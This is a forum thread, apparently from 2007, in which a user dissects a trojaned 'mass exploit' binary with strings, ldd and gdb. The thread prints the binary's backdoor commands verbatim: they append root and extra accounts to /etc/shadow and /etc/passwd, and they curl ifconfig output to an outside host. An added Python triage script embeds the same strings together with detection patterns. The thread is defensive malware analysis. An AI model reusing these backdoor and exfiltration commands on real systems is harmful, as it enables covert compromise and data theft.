nV News Forums (http://www.nvnews.net/vbulletin/index.php)
-   Networking And Security (http://www.nvnews.net/vbulletin/forumdisplay.php?f=58)
-   -   Watch what you trust. (http://www.nvnews.net/vbulletin/showthread.php?t=97428)

evilghost 08-28-07 11:56 AM

Watch what you trust.
This event struck me as unusual so I wanted to share with you why it's normal to be paranoid.

While reading up on my RSS security feeds I found a notification about exploitation of Apache/IMAP, with a link on Security Focus.


The grammatical structure of the message appears odd to say the least. Checking out the site, there are two gzipped tarballs available for download. One includes the source code as well as a binary, the other is just precompiled binaries.

I wanted to show you how you can use the 'strings' command and 'ldd' to find information about an executable. Before you run an untrusted executable, especially as root, you better know for darn sure what it is.

ldd will list the libraries a dynamic executable is linked against; in this case, the executable wasn't statically compiled.


luser@meowbox:~/Desktop$ ldd massxpl
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e10000)
        /lib/ld-linux.so.2 (0xb7f4f000)

Now, look what strings has to say:


luser@meowbox:~/Desktop$ strings massxpl
Mass Xploitz for Apache and Imap
Apache mod_j/k Fedora Core 6/5 - Debian 3.1 - FreeBSD 5.4REL
Gnu mailutils imap4d Fedora Core 6 - Fedora Core 3
Attacking IMAP server on %s...
Press CTRL+C if you want to skip exploit
./xpl/imapfc3 -h %s
Attacking apache server on %s...
./xpl/apache -t 0 -h %s
perl ./xpl/apache.pl %s 1
./xpl/apache -t 1 -h %s
perl ./xpl/apache.pl %s 2
./xpl/apache -t 2 -h %s
perl ./xpl/apache.pl %s 3
./xpl/apache -t 3 -h %s
socket creation error
can not find host
[ %s ] Port %d (TCP) tertutup
[ %s ] Port %d (TCP) terbuka
Checking for banner...
Root priviledge is needed - use your root user OK!
Rename your target list filename to target.txt
echo toor:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadowecho newbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow
echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd
echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd
/usr/bin/curl -d "user=newbie&pass=novice&target=$(ifconfig -a)" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null
Trying to connect to %s port %d

As you can plainly see, the binary wants you to run it as root. When you do, it adds two new users to your /etc/shadow file (newbie and toor) and then to your /etc/password file. It then connects to an HTTP server using curl and reports your IP addresses so the malware author can then come back and connect to you. (http://www.trancefix.org/hell/save.php)

This is poor quality code. Several assumptions are made: curl exists on the system, and ifconfig will return a non-IANA-reserved address.

Either way, this should serve as a wake-up call: malware authors are everywhere, and they're actively trying to compromise your box. If you're not taking the necessary caution, you'll get owned.

Even if you don't know C, read the source code; unless it's marvelously obfuscated, you should be able to pick out oddities. Don't trust precompiled binaries from untrusted sources.
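The triage in the post above (run strings, read the output, look for shell commands that touch /etc/shadow and /etc/passwd or phone home) can be made repeatable. The script below is an added example, not part of the thread and not from the binary's author: a pure-Python stand-in for strings(1) plus a handful of indicator checks a defender would apply before executing anything downloaded. The indicator names and severities are my own; the sample bytes are constructed here from the strings the post quoted, padded with non-printable filler so the extractor has something to skip.

```python
"""Static triage of an untrusted binary by its embedded strings (added example)."""
from __future__ import annotations

import re

# Same default alphabet as strings(1): printable 7-bit ASCII (tab left out for brevity).
PRINTABLE = set(range(0x20, 0x7F))

# name -> (severity, pattern). Patterns are derived from the strings the post found.
INDICATORS: dict[str, tuple[str, re.Pattern[str]]] = {
    "appends to /etc/shadow": ("high", re.compile(r">>\s*/etc/shadow")),
    "appends to /etc/passwd": ("high", re.compile(r">>\s*/etc/passwd")),
    "creates uid 0 account": ("high", re.compile(r"^echo\s+\S+:x:0:0:")),
    "outbound HTTP client": ("high", re.compile(r"\b(curl|wget)\b.*https?://")),
    "exfiltrates host info": ("high", re.compile(r"\$\((ifconfig|id|uname|hostname)\b")),
    # Dynamic-symbol names also show up in strings output; a bare "system" means system(3) is imported.
    "shells out via system()": ("medium", re.compile(r"^system$")),
    "demands root": ("medium", re.compile(r"\broot\b.*\b(need|require|privil)", re.I)),
    "hardcoded URL": ("low", re.compile(r"https?://[\w./-]+")),
}

# Constructed sample: a fake ELF header followed by NUL-separated strings taken from the post.
SAMPLE_BINARY = b"\x7fELF\x01\x01\x01" + b"\x00" * 9 + b"\x00".join([
    b"libc.so.6", b"system", b"puts", b"socket", b"connect",
    b"Mass Xploitz for Apache and Imap",
    b"Attacking IMAP server on %s...",
    b"Root priviledge is needed - use your root user OK!",
    rb"echo toor:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow",
    rb"echo newbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow",
    b"echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd",
    b"echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd",
    b'/usr/bin/curl -d "user=newbie&pass=novice&target=$(ifconfig -a)" '
    b"http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null",
    b"Trying to connect to %s port %d",
]) + b"\x00" + bytes(range(0x80, 0x90))

# Constructed benign sample for comparison: nothing but harmless strings.
BENIGN_BINARY = b"\x7fELF\x01\x01\x01" + b"\x00" * 9 + b"\x00".join([
    b"libc.so.6", b"puts", b"Usage: %s [file]", b"Hello, world",
]) + b"\x00"


def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Return runs of at least min_len printable ASCII bytes, like `strings -n`."""
    found: list[str] = []
    run = bytearray()
    for byte in data + b"\x00":  # trailing sentinel flushes the final run
        if byte in PRINTABLE:
            run.append(byte)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    return found


def triage(data: bytes) -> dict[str, list[str]]:
    """Map each indicator name to the embedded strings that triggered it."""
    hits: dict[str, list[str]] = {}
    for s in extract_strings(data):
        for name, (_severity, pattern) in INDICATORS.items():
            if pattern.search(s):
                hits.setdefault(name, []).append(s)
    return hits


def verdict(hits: dict[str, list[str]]) -> str:
    """'reject' on any high-severity hit, 'review' on medium/low only, else 'clean'."""
    severities = {INDICATORS[name][0] for name in hits}
    if "high" in severities:
        return "reject"
    if severities:
        return "review"
    return "clean"


if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_BINARY), ("benign", BENIGN_BINARY)):
        hits = triage(blob)
        print(f"[{label}] verdict: {verdict(hits)}")
        for name, strings in hits.items():
            print(f"  {INDICATORS[name][0]:6} {name}: {strings[0]!r}")
```

The point of the severity split is that a hard-coded URL or a root check alone is not proof of anything (plenty of legitimate tools have both), whereas a shell command that appends to /etc/shadow is never something a "mass exploit tool" needs for its stated purpose. To run it against a real file, replace the constructed blob with `open(path, "rb").read()`; the extractor only reads bytes and never executes anything, which is the whole point of static triage.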

spaceigg 08-28-07 12:11 PM

Re: Watch what you trust.
interesting. thanks for educating us

evilghost 08-28-07 12:13 PM

Re: Watch what you trust.
You can also use gdb (GNU Debugger) to analyze the executable.

Run "gdb"
Type "file /path/to/massxpl"
Type "disass main" to run the disassembler on the application

Look for the movl calls, they occur around 0x80494e0 and 0x8049534

Type "x/s [address]" and you'll see:


(gdb) x/s 0x80494e0
0x80494e0 <__dso_handle+816>:    "echo toor:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
(gdb) x/s 0x8049534
0x8049534 <__dso_handle+900>:    "echo newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"

evilghost 08-28-07 12:21 PM

Re: Watch what you trust.
When disassembling, these are the things to look for, note the system calls:


0x08048feb <main+262>:  call  0x8048628 <system@plt>
0x08048ff0 <main+267>:  movl  $0x8049534,(%esp)
0x08048ff7 <main+274>:  call  0x8048628 <system@plt>
0x08048ffc <main+279>:  movl  $0x8049588,(%esp)
0x08049003 <main+286>:  call  0x8048628 <system@plt>
0x08049008 <main+291>:  movl  $0x80495bc,(%esp)
0x0804900f <main+298>:  call  0x8048628 <system@plt>
0x08049014 <main+303>:  movl  $0x8049468,0x4(%esp)

And now, what they do:


(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>:  "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x8049534
0x8049534 <__dso_handle+900>:    "echo newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
(gdb) x/s 0x8049588
0x8049588 <__dso_handle+984>:    "echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd"
(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>:  "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x804960c
0x804960c <__dso_handle+1116>:  "/usr/bin/curl -d \"user=newbie&pass=novice&target=$(ifconfig -a)\" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null"

evilghost 08-28-07 01:14 PM

Re: Watch what you trust.
You can also use gdb to list the functions of the program and then disassemble and inspect certain aspects of that function.


(gdb) info functions
All defined functions:

Non-debugging symbols:
0x080485d0  _init
0x080485f8  close@plt
0x08048608  select@plt
0x08048618  bcopy@plt
0x08048628  system@plt
0x08048638  puts@plt
0x08048648  getpeername@plt
0x08048658  fgets@plt
0x08048668  strstr@plt
0x08048678  __libc_start_main@plt
0x08048688  printf@plt
0x08048698  getuid@plt
0x080486a8  fcntl@plt
0x080486b8  fclose@plt
0x080486c8  snprintf@plt
0x080486d8  gethostbyname@plt
0x080486e8  exit@plt
0x080486f8  send@plt
0x08048708  htons@plt
0x08048718  memset@plt
---Type <return> to continue, or q <return> to quit---
0x08048728  connect@plt
0x08048738  fopen@plt
0x08048748  recv@plt
0x08048758  socket@plt
0x08048768  __gmon_start__@plt
0x08048780  _start
0x080487a4  call_gmon_start
0x080487d0  __do_global_dtors_aux
0x08048800  frame_dummy
0x08048824  promosi
0x08048850  imapattack
0x080488a7  apacheattack
0x08048ac8  ctimeout
0x08048ca0  bannertest
0x08048ee5  main
0x08049104  __libc_csu_fini
0x0804910c  __libc_csu_init
0x08049160  __do_global_ctors_aux
0x0804918c  _fini
(gdb) disass fopen
No symbol table is loaded.  Use the "file" command.
(gdb) disass fopen\@plt
No symbol table is loaded.  Use the "file" command.
(gdb) disass promosi
Dump of assembler code for function promosi:
0x08048824 <promosi+0>: push  %ebp
0x08048825 <promosi+1>: mov    %esp,%ebp
0x08048827 <promosi+3>: sub    $0x8,%esp
0x0804882a <promosi+6>: movl  $0x80491b4,(%esp)
0x08048831 <promosi+13>:        call  0x8048638 <puts@plt>
0x08048836 <promosi+18>:        movl  $0x80491d8,(%esp)
0x0804883d <promosi+25>:        call  0x8048638 <puts@plt>
0x08048842 <promosi+30>:        movl  $0x8049218,(%esp)
0x08048849 <promosi+37>:        call  0x8048638 <puts@plt>
0x0804884e <promosi+42>:        leave
0x0804884f <promosi+43>:        ret
End of assembler dump.
(gdb) x/s 0x80491d8
0x80491d8 <__dso_handle+40>:    "Apache mod_j/k Fedora Core 6/5 - Debian 3.1 - FreeBSD 5.4REL"
(gdb) x/s 0x8049218
0x8049218 <__dso_handle+104>:    "Gnu mailutils imap4d Fedora Core 6 - Fedora Core 3\n\n"

wnd 09-04-07 06:31 AM

Re: Watch what you trust.
Somehow your post reminded me of Ken Thompson's article "Reflections on Trusting Trust": "The moral is obvious. You can't trust code that you did not totally create yourself."

Copyright 1998 - 2014, nV News.